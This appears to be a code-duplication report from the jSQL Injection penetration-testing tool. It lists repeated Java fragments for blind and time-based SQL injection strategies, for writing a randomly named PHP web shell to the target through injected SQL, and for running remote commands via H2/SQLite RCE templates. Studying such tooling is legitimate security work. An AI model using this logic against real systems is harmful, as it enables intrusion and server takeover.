this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty("exploit.web") ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameDbRandom = RandomStringUtils.secure().nextAlphabetic(8); var nameTableRandom = RandomStringUtils.secure().nextAlphabetic(8); var nameExploit = nameDbRandom + nameTableRandom +".php"; this.injectionModel.injectWithoutIndex(String.format( this.modelYaml.getWriteFile(), pathExploit + nameExploit, nameDbRandom, nameDbRandom, nameTableRandom, nameDbRandom, nameTableRandom, bodyExploit ), ResourceAccess.TBL_DUMP); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { |
File | Line |
---|---|
com/jsql/model/injection/strategy/StrategyBlindBin.java | 119 |
com/jsql/model/injection/strategy/StrategyTime.java | 119 |
this.injectionModel.getMediatorVendor().getVendor().instance().sqlBlind(sqlQuery, startPosition, false), stoppable ); } @Override public void activateWhenApplicable() { if (this.injectionModel.getMediatorStrategy().getStrategy() == null && this.isApplicable()) { LOGGER.log( LogLevelUtil.CONSOLE_INFORM, "{} [{}] with [{}]", () -> I18nUtil.valueByKey("LOG_USING_STRATEGY"), this::getName, () -> this.injection.getBlindOperator().name() ); this.injectionModel.getMediatorStrategy().setStrategy(this); var request = new Request(); request.setMessage(Interaction.MARK_BLIND_BIN_STRATEGY); |
File | Line |
---|---|
com/jsql/model/injection/strategy/StrategyBlindBit.java | 119 |
com/jsql/model/injection/strategy/StrategyTime.java | 119 |
this.injectionModel.getMediatorVendor().getVendor().instance().sqlBlind(sqlQuery, startPosition, false), stoppable ); } @Override public void activateWhenApplicable() { if (this.injectionModel.getMediatorStrategy().getStrategy() == null && this.isApplicable()) { LOGGER.log( LogLevelUtil.CONSOLE_INFORM, "{} [{}] with [{}]", () -> I18nUtil.valueByKey("LOG_USING_STRATEGY"), this::getName, () -> this.injection.getBlindOperator().name() ); this.injectionModel.getMediatorStrategy().setStrategy(this); var request = new Request(); request.setMessage(Interaction.MARK_BLIND_BIT_STRATEGY); |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitH2.java | 67 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | 64 |
this.modelYaml.getRce().getRunCmd(), command.replace(StringUtils.SPACE, "%20") ), ResourceAccess.RUN_FUNC); } catch (JSqlException e) { result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command); } var request = new Request(); request.setMessage(Interaction.GET_TERMINAL_RESULT); request.setParameters(uuidShell, result.trim() +"\n"); // missing newline on some extensions this.injectionModel.sendToViews(request); return result; } public String createWeb(String pathExploit, String urlExploit) { LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge"); |
File | Line |
---|---|
com/jsql/model/injection/strategy/blind/callable/CallableBlindBin.java | 65 |
com/jsql/model/injection/strategy/blind/callable/CallableBlindBit.java | 53 |
} /** * Check if a result page means the SQL query is true, * confirm that nothing in the resulting page is also defined * in the pages from every FALSE SQL queries. * @return true if the current SQL query is true */ @Override public boolean isTrue() { // Fix #95426: ConcurrentModificationException on iterator.next() List<Diff> falseDiffs = new CopyOnWriteArrayList<>(this.injectionBlind.getFalseDiffs()); for (Diff falseDiff: falseDiffs) { // ignored when false OR false => falsy empty // Fix #4386: NullPointerException on contains(), diffsWithReference initialized to new LinkedList<>() if (this.diffsWithReference.contains(falseDiff)) { return false; } } List<Diff> trueDiffs = new CopyOnWriteArrayList<>(this.injectionBlind.getTrueDiffs()); for (Diff trueDiff: trueDiffs) { if (!this.diffsWithReference.contains(trueDiff)) { // required, set to false when empty falseDiffs return false; } } return true; // not in falseDiffs and in trueDiffs } /** * Process the URL HTTP call, use function inject() from the model. * Build the list of differences found between TRUE and the current page. * @return Functional Blind Callable */ @Override public CallableBlindBin call() { |